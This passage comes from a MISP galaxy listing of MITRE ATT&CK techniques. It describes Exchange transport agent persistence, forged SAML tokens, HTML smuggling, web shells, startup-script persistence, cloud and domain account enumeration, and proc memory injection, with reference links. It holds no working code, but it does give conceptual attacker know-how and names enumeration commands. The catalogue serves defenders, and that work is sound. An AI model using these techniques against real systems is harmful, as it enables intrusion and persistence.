Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002"

Table 3698. Table References
Links
https://attack.mitre.org/techniques/T1505/002
https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

SAML Tokens - T1606.002

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions …</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization’s token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002"

Table 3699. Table References
Links
https://attack.mitre.org/techniques/T1606/002
https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/
https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes
https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps
https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
https://www.sygnia.co/golden-saml-advisory

HTML Smuggling - T1027.006

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)

Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.

For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)

The tag is: misp-galaxy:mitre-attack-pattern="HTML Smuggling - T1027.006"

Table 3700. Table References
Links
https://attack.mitre.org/techniques/T1027/006
https://www.menlosecurity.com/blog/new-attack-alert-duri
https://outflank.nl/blog/2018/08/14/html-smuggling-explained/
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/

Upload Tool - T1608.002

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

The tag is: misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002"

Table 3701. Table References
Links
https://attack.mitre.org/techniques/T1608/002
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Domain Groups - T1069.002

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"

Table 3702. Table References
Links
https://attack.mitre.org/techniques/T1069/002

Domain Accounts - T1078.002

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002"

Table 3703. Table References
Links
https://attack.mitre.org/techniques/T1078/002
https://capec.mitre.org/data/definitions/560.html
https://technet.microsoft.com/en-us/library/dn535501.aspx
https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts
https://technet.microsoft.com/en-us/library/dn487457.aspx
https://ubuntu.com/server/docs/service-sssd

Domain Account - T1087.002

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.

Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"

Table 3704. Table References
Links
https://attack.mitre.org/techniques/T1087/002
https://capec.mitre.org/data/definitions/575.html

RC Scripts - T1037.004

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script’s contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)

The tag is: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004"

Table 3705. Table References
Links
https://attack.mitre.org/techniques/T1037/004
https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/
https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html

Scheduled Task - T1053.005

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The <code>schtasks</code> can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"

Table 3706. Table References
Links
https://attack.mitre.org/techniques/T1053/005
https://twitter.com/leoloobeek/status/939248813465853953
https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
https://technet.microsoft.com/library/dd315590.aspx
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
https://technet.microsoft.com/en-us/sysinternals/bb963902

Web Shell - T1505.003

Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003"

Table 3707. Table References
Links
https://attack.mitre.org/techniques/T1505/003
https://capec.mitre.org/data/definitions/650.html
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
https://github.com/nsacyber/Mitigating-Web-Shells
https://www.us-cert.gov/ncas/alerts/TA15-314A

Systemd Timers - T1053.006

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)

Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006"

Table 3708. Table References
Links
https://attack.mitre.org/techniques/T1053/006
https://wiki.archlinux.org/index.php/Systemd/Timers
https://www.tecmint.com/control-systemd-services-on-remote-linux-server/
http://man7.org/linux/man-pages/man1/systemd.1.html
https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

Startup Items - T1037.005

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)

This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

The tag is: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005"

Table 3709. Table References
Links
https://attack.mitre.org/techniques/T1037/005
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Cloud Groups - T1069.003

Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).

Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated to a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code>; lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).

Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Groups - T1069.003"

Table 3710. Table References
Links
https://attack.mitre.org/techniques/T1069/003
https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0
https://github.com/True-Demon/raindance
https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
https://cloud.google.com/identity/docs/reference/rest
https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html

Email Account - T1087.003

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)

In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)

The tag is: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003"

Table 3711. Table References
Links
https://attack.mitre.org/techniques/T1087/003
https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
https://support.google.com/a/answer/166870?hl=en

Local Accounts - T1078.003

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

The tag is: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003"

Table 3712. Table References
Links
https://attack.mitre.org/techniques/T1078/003

IIS Components - T1505.004

Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)

Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)

Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)

The tag is: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004"

Table 3713. Table References
Links
https://attack.mitre.org/techniques/T1505/004
https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)
https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)
https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/
https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx
https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf
https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

Network Topology - T1590.004

Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Topology - T1590.004"

Table 3714. Table References
Links
https://attack.mitre.org/techniques/T1590/004
https://dnsdumpster.com/

Unix Shell - T1059.004

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004"

Table 3715. Table References
Links
https://attack.mitre.org/techniques/T1059/004
https://linux.die.net/man/1/bash
https://support.apple.com/HT208050

Cloud Accounts - T1078.004

Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)

Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004"

Table 3716. Table References
Links
https://attack.mitre.org/techniques/T1078/004
https://aws.amazon.com/identity/federation/
https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction
https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs

Cloud Account - T1087.004

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)

The AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004"

Table 3717. Table References
Links
https://attack.mitre.org/techniques/T1087/004
https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
https://github.com/True-Demon/raindance
https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list

IP Addresses - T1590.005

Adversaries may gather the victim’s IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005"

Table 3718. Table References
Links
https://attack.mitre.org/techniques/T1590/005
https://www.whois.net/
https://dnsdumpster.com/
https://www.circl.lu/services/passive-dns/

Visual Basic - T1059.005

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005"

Table 3719. Table References
Links
https://attack.mitre.org/techniques/T1059/005
https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/
https://docs.microsoft.com/dotnet/visual-basic/
https://docs.microsoft.com/office/vba/api/overview/
https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)

Proc Memory - T1055.009

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man)

Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009"

Table 3720. Table References
Links
https://attack.mitre.org/techniques/T1055/009
http://hick.org/code/skape/papers/needle.txt
https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
http://man7.org/linux/man-pages/man1/dd.1.html

Link Target - T1608.005

